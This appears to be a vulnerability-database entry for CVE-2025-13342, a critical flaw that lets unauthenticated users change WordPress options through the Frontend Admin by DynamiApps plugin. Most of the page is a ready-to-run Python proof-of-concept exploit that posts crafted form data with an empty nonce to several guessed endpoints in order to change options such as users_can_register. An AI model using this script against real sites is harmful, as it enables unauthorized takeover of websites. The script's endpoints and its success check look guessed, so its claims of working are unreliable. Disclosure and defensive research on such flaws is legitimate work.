Security Vulnerability Report
CVE-2025-13342 CVSS 9.8 CRITICAL

Published: 2025-12-03 13:16:02
Last Modified: 2026-04-15 00:35:42

Description

The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthorized modification of arbitrary WordPress options in all versions up to, and including, 3.28.20. This is due to insufficient capability checks and input validation in the ActionOptions::run() save handler. This makes it possible for unauthenticated attackers to modify critical WordPress options such as users_can_register, default_role, and admin_email by submitting crafted form data to public frontend forms.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Frontend Admin by DynamiApps (WordPress plugin) <= 3.28.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13342 PoC - Unauthorized WordPress Options Modification
# Target: Frontend Admin plugin for WordPress
# Vulnerability: Missing capability check in ActionOptions::run() handler


def exploit(target_url, target_option, option_value):
    """
    Exploit the vulnerability by modifying WordPress options without authentication.

    Args:
        target_url: Base URL of the WordPress site
        target_option: The option name to modify (e.g., 'users_can_register')
        option_value: The new value for the option

    Returns:
        Response from the server, or None if no endpoint accepted the request
    """
    # Endpoint for the frontend admin form (common paths)
    endpoints = [
        '/frontend-admin-options-form/',
        '/?acf_frontend_options=save',
        '/wp-json/acf-frontend/v1/options',
    ]

    # Payload to modify WordPress options
    payload = {
        'acf_form_id': 'frontend_options',
        'option_name': target_option,
        'option_value': option_value,
        'action': 'acf_frontend_save_form',
        '_acf_nonce': '',  # Empty nonce - vulnerability allows bypass
    }

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.post(url, data=payload, timeout=10)
            if response.status_code == 200:
                print(f'[+] Successfully sent payload to {url}')
                print(f'[+] Attempting to modify {target_option} to {option_value}')
                return response
        except requests.RequestException as e:
            print(f'[-] Error targeting {url}: {e}')
            continue
    return None


def main():
    # Script name plus three positional arguments: <target_url> <option> <value>
    if len(sys.argv) < 4:
        print('Usage: python cve-2025-13342.py <target_url> <option> <value>')
        print('Example: python cve-2025-13342.py https://example.com users_can_register 1')
        sys.exit(1)

    target = sys.argv[1]
    option = sys.argv[2]
    value = sys.argv[3]

    print('[*] CVE-2025-13342 Exploit - Frontend Admin Plugin')
    print(f'[*] Target: {target}')
    print(f'[*] Modifying option: {option} to value: {value}')

    result = exploit(target, option, value)
    if result:
        print('[+] Exploit sent successfully')
    else:
        print('[-] Exploitation failed')


if __name__ == '__main__':
    main()
```

References

https://plugins.trac.wordpress.org/changeset/3400432/acf-frontend-form-element
https://www.wordfence.com/threat-intel/vulnerabilities/id/613f2035-3061-429b-b218-83805287e4f3?source=cve

Weakness

CWE-862 (Missing Authorization)